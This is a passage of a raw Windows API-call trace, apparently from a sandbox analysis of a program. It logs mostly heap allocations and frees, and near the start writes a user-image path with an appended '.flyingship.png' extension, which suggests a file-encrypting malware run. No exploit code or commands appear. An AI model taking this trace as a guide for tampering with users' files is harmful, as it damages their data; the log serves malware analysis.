(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0189.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5d10 [0189.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\n", cchWideChar=94, lpMultiByteStr=0x9a5d10, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 94 [0189.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0189.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0189.410] WriteFile (in: hFile=0x158, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x5d, lpOverlapped=0x0) returned 1 [0189.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0189.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.410] CloseHandle (hObject=0x158) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.415] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.415] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0189.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0189.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.416] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0189.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0189.417] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0189.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.420] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) 